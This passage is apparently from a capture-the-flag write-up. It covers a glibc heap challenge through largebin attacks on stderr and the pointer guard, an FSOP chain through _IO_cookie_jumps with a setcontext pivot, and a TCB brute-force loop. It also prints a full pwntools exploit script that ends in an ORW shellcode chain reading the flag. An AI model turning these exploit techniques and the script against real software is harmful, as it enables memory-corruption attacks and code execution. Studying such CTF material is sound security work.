Pointer: Using a Largebin Attack, we overwrite thestderr
pointer with a known address, specifically the victim largebin chunk. - Hijack the
pointer_guard
(__pointer_chk_guard
): A second Largebin Attack targets thepointer_guard
stored infs:[0x30]
, which is critical for bypassing security checks. - Modify the Top Chunk Size: We consolidate a freed unsorted bin chunk into the top chunk, enabling us to manipulate the metadata on the overlapping top chunk.
- House of Emma Attack Chain: We hijack the
__io_functions.write
and__cookie
pointers in the_IO_cookie_file
structure. After modifying the vtable pointer to_IO_cookie_jumps+0x40
, we overwrite theRIP
and gain control of the execution flow. In my EXP, the exploitation uses gadgets such asgetservkey_handle+276
andsetcontext+61
to manipulate the control flow. - ORW (Open, Read, Write) Chain: Finally, on the return address of the
setcontext
attack chain, we place an ORW chain to read the flag.
Brute Force TCB
We mentioned earlier that the pointer guard is stored at fs:[0x30]
, which can be viewed in GDB, allowing us to calculate the offset relative to the leaked LIBC base address.
However, this offset can vary across different environments, as it is dynamically initialized by the linker (ld
). Additionally, random padding between the ld
and LIBC base addresses makes it harder to pinpoint the exact location.
When exploiting this type of challenge on a remote server, it may become necessary to brute-force the address of the Thread Control Block (TCB) pointers stored in the FS register. The lower 12 bits of the TCB-pointer address remain constant, so the brute-forcing process typically focuses on the 4th, 5th, and 6th hex digits of the 64-bit address. Here's an example of a brute-forcing script:
for x in range(0x10):
for y in range(0x10):
try:
libc_base = 0xdeadbeef
offset = 0x6 << 20 # 6th: i.e. starts from 0x600000
offset += x << 16 # 5th: from 0x600000 to 0x6F0000
offset += y << 12 # 4th: Increment within each 0x1000 (4KB) memory page
ld_base = libc_base + offset
log.success("try offset:\t" + hex(offset))
# exploit script
exp()
except EOFError:
p.close()
As an alternative, we can also set up a Docker environment to simulate the remote target, allowing us to test and identify the ld
base address before launching the actual exploit.
EXP
Detailed explanations are provided within the comments in the Python script. And you will need to modify the pointer_guard
value according to your environment for specific offset:
from pwn import *
import inspect
def g(gdbscript=''):
if mode['local']:
sysroot = None
if libc_path != '':
sysroot = os.path.dirname(libc_path)
gdb.attach(p, gdbscript=gdbscript, sysroot=sysroot)
if gdbscript == '':
raw_input()
elif mode['remote']:
gdb.attach((remote_ip_addr, remote_port), gdbscript)
if gdbscript == '':
raw_input
def pa(addr):
frame = inspect.currentframe().f_back
variables = {k: v for k, v in frame.f_locals.items() if v is addr}
desc = next(iter(variables.keys()), "unknown")
info('@{} ---> %#x'.format(desc), addr)
s = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
r = lambda num=4096 :p.recv(num)
ru = lambda delim, drop=True :p.recvuntil(delim, drop)
l64 = lambda :u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
uu64 = lambda data :u64(data.ljust(8, b'\0'))
def rol(xor, shift, bit_size):
"""Performs a bitwise left rotate (ROL) on the enc."""
return ((xor << shift) | (xor >> (bit_size - shift))) & ((1 << bit_size) - 1)
def PTR_MANGLE(ptr, ptr_guard, shift, bit_size):
xor = ptr ^ ptr_guard
return rol(xor, shift, bit_size)
def add(idx, size):
global opcodes
op = p8(0x1)
op += p8(idx)
op += p16(size)
opcodes += op
def free(idx):
global opcodes
op = p8(0x2)
op += p8(idx)
opcodes += op
def edit(idx, buf):
global opcodes
op = p8(0x4)
op += p8(idx)
op += p16(len(buf))
op += buf
opcodes += op
def show(idx):
global opcodes
op = p8(0x3)
op += p8(idx)
opcodes += op
def run_opcode():
global opcodes
opcodes += p8(0x5)
sa("opcode\n", opcodes)
# print('[!] Run opcodes: ', str(opcodes))
opcodes = b""
opcodes = b''
deadbeef = p64(0xdeadbeef)
def exp():
# -------- 1 -------- Leak Addresses
# UAF
add(0, 0x410)
add(1, 0x410)
add(2, 0x420)
add(3, 0x410)
free(2) # 2 -> usbin
add(4, 0x430) # 2 -> lbin
show(2)
run_opcode()
libc_base = l64() - 0x1f30b0 # main_arena + 1104
pa(libc_base)
edit(2, b'a'*0x10)
show(2)
run_opcode()
ru(b'a'*0x10)
heap_base = uu64(r(6)) - 0x2ae0
pa(heap_base)
# ------- 2 -------- Bullets
stderr = libc_base + libc.sym['stderr']
_IO_cookie_jumps = libc_base + libc.sym['_IO_cookie_jumps']
ptr_guard_addr = libc_base - 0x28c0 + 0x30 # fs:[0x30]
setcontext = libc_base + libc.sym['setcontext'] + 61
mprotect = libc_base + libc.sym['mprotect']
gksh_gadget = libc_base + 0x146020 # mov rdx, [rdi + 8]; mov [rsp], rax; call [rdx + 0x20];
pa(stderr)
pa(ptr_guard_addr)
pa(_IO_cookie_jumps)
pa(setcontext)
pa(gksh_gadget)
rop = ROP(libc)
p_rdi_r = libc_base + rop.find_gadget(['pop rdi', 'ret'])[0]
p_rsi_r = libc_base + rop.find_gadget(['pop rsi', 'ret'])[0]
p_rdx_rbx_r = libc_base + rop.find_gadget(['pop rdx', 'pop rbx', 'ret'])[0]
p_rax_r = libc_base + rop.find_gadget(['pop rax', 'ret'])[0]
syscall_r = libc_base + rop.find_gadget(['syscall', 'ret'])[0]
ret = libc_base + rop.find_gadget(['ret'])[0]
fakeIO_addr = heap_base+0x22a0 # 0
mprotect_chain = [p_rdi_r, fakeIO_addr&(~0xfff), p_rsi_r, 0x4000, \
p_rdx_rbx_r, 7, 0, mprotect, fakeIO_addr+0x140] # 0x48 bytes
orw_chain = asm(shellcraft.cat('./flag')) # 0x23 bytes
pa(fakeIO_addr)
# -------- 3 -------- Largebin Attack stderr
free(0)
pl = flat({
0x0: [libc_base+0x1f30b0, libc_base+0x1f30b0],
0x10: [heap_base+0x2ae0, stderr-0x20], # hijack bk_nextsize
})
edit(2, pl) # 2 -> lbin larger
add(5, 0x430) # 0 -> lbin smaller <- *stderr
# recover 2
pl = flat({
0x0: [heap_base+0x22a0, libc_base+0x1f30b0],
0x10: [heap_base+0x22a0, heap_base+0x22a0], # address of heap 0
})
edit(2, pl)
# recover 0
pl = flat({
0x0: [libc_base+0x1f30b0, heap_base+0x2ae0],
0x10: [heap_base+0x2ae0, heap_base+0x2ae0], # address of heap 2
})
edit(0, pl)
add(2, 0x420)
add(0, 0x410)
run_opcode()
# -------- 4 -------- Largebin Attack Pointer Gurard
free(2)
add(6, 0x430)
free(0)
pl = flat({
0x0: [libc_base+0x1f30b0, libc_base+0x1f30b0],
0x10: [heap_base+0x2ae0, ptr_guard_addr-0x20], # hijack bk_nextsize
})
edit(2, pl) # 2 -> lbin larger
add(7, 0x450) # 0 -> lbin smaller <- *ptr_guard_addr
# recover 2
pl = flat({
0x0: [heap_base+0x22a0, libc_base+0x1f30b0],
0x10: [heap_base+0x22a0, heap_base+0x22a0], # address of heap 0
})
edit(2, pl)
# recover 0
pl = flat({
0x0: [libc_base+0x1f30b0, heap_base+0x2ae0],
0x10: [heap_base+0x2ae0, heap_base+0x2ae0], # address of heap 2
})
edit(0, pl)
add(2, 0x420)
add(0, 0x410)
# -------- 5 -------- House of Kiwi
# change top chunk size
free(7) # 7 -> top chunk
add(8, 0x430)
edit(7, b'a'*0x438+p64(0x300))
run_opcode()
# FSOP
pl = flat({
# fake stderr & _IO_cookie_file
0: {
0x0: 0, # _flag
0x20: 0, # _IO_write_base
0x28: 1, # _IO_write_ptr
0x38: 0, # _IO_buf_base
0x40: 0, # _IO_buf_end
0x68: 0, # _chain
0x88: fakeIO_addr+0x300, # _lock
0xc0: 0, # mode
0xd8: _IO_cookie_jumps+0x40, # vtable
0xe0: fakeIO_addr + 0x100, # rdi
# mov rdx, [rdi + 8]; mov [rsp], rax; call [rdx + 0x20];
0xf0: PTR_MANGLE(gksh_gadget, heap_base+0x22a0, 0x11, 64), # enc
},
# ORW
0x100: {
0x8: fakeIO_addr + 0x100, # rdx
# <+61>: mov rsp, [rdx+0xa0]
# <+294>: mov rcx, [rdx+0xa8]
# <+301>: push rcx
# <+334>: ret
0x20: setcontext, # gksh_gadget ->
0x40: orw_chain, # mprotect ->
0xa0: [fakeIO_addr+0x200, ret],
},
0x200: {
0x0: mprotect_chain,
}
}, filler='\0')
edit(0, pl[0x10:])
# g()
# trigger
add(8, 0x450) # b'\x01\x08P\x04\x05'
"""
Manually trigger after breakpoint:
printf '\x01\x08P\x04\x05' > pl.bin
cat pl.bin > /proc/<pid>/fd/0
"""
run_opcode()
# g()
p.interactive()
if __name__ == '__main__':
file_path = './pwn'
libc_path = './libc.so.6'
ld_path = './ld.so'
context(arch='amd64', os='linux', endian='little')
# context.log_level='debug'
e = ELF(file_path, checksec=False)
mode = {'local': False, 'remote': False, }
env = None
if len(sys.argv) > 1:
if libc_path != '':
libc = ELF(libc_path)
p = remote(sys.argv[1], int(sys.argv[2]))
mode['remote'] = True
remote_ip_addr = sys.argv[1]
remote_port = int(sys.argv[2])
else:
if libc_path != '':
libc = ELF(libc_path)
env = {'LD_PRELOAD': libc_path}
if ld_path != '':
cmd = [ld_path, '--library-path', os.path.dirname(os.path.abspath(libc_path)), file_path]
p = process(cmd, env=env)
else:
p = process(file_path, env=env)
mode['local'] = True
exp()
Pwned:
Comments | NOTHING